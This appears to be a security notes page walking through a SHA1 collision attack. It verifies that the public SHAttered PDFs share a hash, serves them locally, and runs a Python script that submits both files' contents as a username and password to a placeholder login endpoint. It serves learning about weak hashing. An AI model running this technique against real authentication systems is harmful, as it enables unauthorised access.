SHA1 Hash Collision Attack

Sample Attacks

1. Download two Files

There are several ways to download files. So we can select our desired files as purposes.

Download the original two PDF files in SHAttered.
Download two custom Files (e.g. messageA and messageB) in Chosen-Prefix Collision Example.

Check if the SHA1 hash is the same as each other.

sha1sum shattered-1.pdf
sha1sum shattered-2.pdf

sha1sum messageA
sha1sum messageB

2. Host the PDF Files Locally

In the directory where the two PDF files located, start local server for using in a Python script.

python3 -m http.server 8000

3. Create a Python Script

For example, create a “test.py”.

import requests

file1 = "shattered-1.pdf"
file2 = "shattered-2.pdf"

pdf_1 = requests.get(f'http://localhost:8000/{file1}')
pdf_2 = requests.get(f'http://localhost:8000/{file2}')

# e.g. the two values can be used as username/password.
params = {'username': pdf_1.content, 'password': pdf_2.content}
r = requests.get('https://example.com/login', params=params)
print(r.text)

4. Run the Script

python3 test.py

References

PreviousRSA (Rivest Shamir Adleman)NextSHA1, SHA256, SHA512

Last updated 1 month ago

hashtagSample Attacks

hashtag1. Download two Files

hashtag2. Host the PDF Files Locally

hashtag3. Create a Python Script

hashtag4. Run the Script

hashtagReferences